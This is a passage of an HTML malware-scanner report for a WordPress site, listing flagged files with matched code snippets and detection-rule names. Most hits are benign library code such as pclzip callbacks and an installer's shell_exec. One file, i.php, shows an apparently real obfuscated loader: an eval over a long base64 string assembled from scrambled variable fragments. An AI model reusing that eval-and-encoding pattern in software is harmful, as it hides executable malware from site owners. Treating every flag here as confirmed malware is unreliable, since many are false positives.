#007700">)&nbsp;{&nbsp;print&nbsp;</span><span style="color: #0000BB">str_repeat</span><span style="color: #007700">(</span><span style="color: #DD0000">"&nbsp;"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">depth&nbsp;</span><span style="color: #007700">*&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">indent</span><span style="color: #007700">)&nbsp;.&nbsp;</span><span style="color: #0000BB">$msg&nbsp;</span><span style="color: #007700">.</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">error_handler</span><span style="color: #007700">(</span><span style="color: #0000BB">$log_level</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$log_text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$error_file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$error_line</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">error&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$log_text</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">parse</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">set_error_handler</span><span style="color: #007700">(array(&amp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'error_handler'</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">array_unshift</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ns_contexts</span><span style="color: #007700">,...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_39").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-snapshots/20190731_likoholding_bc188927d689865dbba9a0ccab37bb40_20190731190148_installer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 57.72 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_40" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/'</span><span style="color: #007700">.</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">INSTALLER_DIR_NAME</span><span style="color: #007700">.</span><span style="color: #DD0000">'/lib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$snaplib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">.</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;if(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$local_lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$unzip_command&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$unzip_filepath</span><span style="color: #DD0000">&nbsp;-q&nbsp;</span><span style="color: #0000BB">$archive_filepath</span><span style="color: #DD0000">&nbsp;snaplib/*&nbsp;2&gt;&amp;1"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">log</span><span style="color: #007700">(</span><span style="color: #DD0000">"Executing&nbsp;</span><span style="color: #0000BB">$unzip_command</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">mkdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">,</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">rename</span><span style="color: #007700">(</span><span style="color: #0000BB">$local_lib_directory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_40").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/i.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_41" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_41").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/contact-form-7/includes/formatting.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_42" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'$matches'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;str_replace("\n",&nbsp;"&lt;WPPreserveNewline&nbsp;/&gt;",&nbsp;$matches[0]);'&nbsp;</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'|(?&lt;!&lt;br&nbsp;/&gt;)\s*\n|'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"&lt;br&nbsp;/&gt;\n"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'&lt;WPPreserveNewline&nbsp;/&gt;'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'!(&lt;/?'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$allblocks&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'[^&gt;]*&gt;)\s*&lt;br&nbsp;/&gt;!'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"$1"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'!&lt;br&nbsp;/&gt;(\s*&lt;/?(?:p|li|div|dl|dd|dt|th|pre|td|ul|ol)[^&gt;]*&gt;)!'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'$1'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$pee</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'&lt;pre'&nbsp;</span><span style="color: #007700">)&nbsp;!==&nbsp;</span><span style="color: #0000BB">false&nbsp;</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">preg_replace_callback</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'!(&lt;pre[^&gt;]*&gt;)(.*?)&lt;/pr...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_42").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/libraries/pclzip.lib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 185.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:26</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_43" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3390</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5166</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_43").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 41.31 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_44" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$e'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'trigger_error($e-&gt;getMessage(),&nbsp;E_USER_ERROR);'</span><span style="color: #007700">);&nbsp;}&nbsp;else{&nbsp;</span><span style="color: #0000BB">$exception_handler&nbsp;</span><span style="color: #007700">=&nbsp;function(</span><span style="color: #0000BB">$e</span><span style="color: #007700">){&nbsp;</span><span style="color: #0000BB">trigger_error</span><span style="color: #007700">(</span><span style="color: #0000BB">$e</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">getMessage</span><span style="color: #007700">(),&nbsp;</span><span style="color: #0000BB">E_USER_ERROR</span><span style="color: #007700">);&nbsp;};&nbsp;}&nbsp;</span><span style="color: #0000BB">set_exception_handler</span><span style="color: #007700">(</span><span style="color: #0000BB">$exception_handler</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$option_name&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">get_class</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">)&nbsp;.&nbsp;</span><span style="color: #DD0000">'_Options'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$options_default&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">PMXI_Config</span><span style="color: #007700">::</span><span style="color: #0000BB">createFromFile</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">ROOT_DIR&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/config/options.php'</span><span style="color: #007700">)-&gt;</span><span style="color: #0000BB">toArray</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$wpai_options&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">get_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$option_name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$wpai_options&nbsp;</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">update_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$option_name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$options_default</span><span style="color: #007700">);&nbsp;require_once&nbsp;</span><span style="color: #0000BB">ABSPATH&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'w...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_44").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Reader/Excel5.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 285.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_45" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit hacked_by <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hacker credits</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Hacked&nbsp;by</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_45").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Helper/HTML.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 24.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_46" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">lave</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_46").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 209.23 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_47" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
